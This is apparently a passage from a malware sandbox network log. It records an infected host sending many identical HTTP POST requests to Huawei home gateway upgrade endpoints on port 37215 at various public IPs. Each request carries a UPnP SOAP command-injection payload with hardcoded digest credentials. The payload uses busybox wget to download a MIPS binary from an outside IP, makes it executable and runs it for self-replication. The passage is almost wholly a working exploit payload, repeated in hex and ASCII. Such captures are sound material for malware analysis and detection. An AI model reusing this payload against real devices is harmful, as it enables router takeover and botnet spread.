2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1595192.168.2.1354660162.168.44.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586879969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1596192.168.2.1357172157.83.112.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586919069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1597192.168.2.1355096197.98.131.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587136984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1598192.168.2.1347788157.231.192.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587157011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1599192.168.2.1344900157.209.10.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587177992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1600192.168.2.1341148157.0.137.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587188005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1601192.168.2.134998049.190.137.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587461948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1602192.168.2.1351910197.63.129.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587470055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1603192.168.2.134308641.95.58.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587491035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1604192.168.2.1334058197.208.191.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587546110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1605192.168.2.1345508197.165.56.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.587574959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
